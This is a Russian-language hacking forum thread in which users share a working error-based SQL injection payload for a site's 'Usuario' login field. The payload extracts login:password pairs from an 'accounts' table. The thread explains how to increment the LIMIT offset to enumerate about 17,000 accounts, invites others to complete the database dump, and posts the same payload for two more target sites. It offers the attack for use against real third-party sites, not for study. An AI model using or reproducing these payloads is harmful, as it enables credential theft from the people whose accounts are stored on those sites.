[Ссылки могут видеть только зарегистрированные пользователи. ]
уязвимое поле Usuario:
Вставляем туда 'and(select 1 from(select count(*),concat((select concat_ws(0x3a,login,password) from accounts limit 2,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
limit 2-эту двойку меняем на 3,4,5,6,7 и так до 17000,1),перебор аккаунтов
в базе как вы поняли 17000 аккаунтов.
Кинул в шару, так как дамп базы сделать несмог)
Если кто то сможет дамп сделать скажите потом как сделали)
Последний раз редактировалось SnoPy; 09.01.2013 в 03:33.
[Ссылки могут видеть только зарегистрированные пользователи. ]
тут тоже самое)
'and(select 1 from(select count(*),concat((select concat_ws(0x3a,login,password) from accounts limit 17,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
[Ссылки могут видеть только зарегистрированные пользователи. ]
тут тоже самое)
'and(select 1 from(select count(*),concat((select concat_ws(0x3a,login,password) from accounts limit 17,1),floor(rand(0)*2))x from information_schema.tables group by x)a)and'
на сайта сервер онлайн, а на самом деле офф(
Последний раз редактировалось Quck_7!lver; 11.01.2013 в 03:59.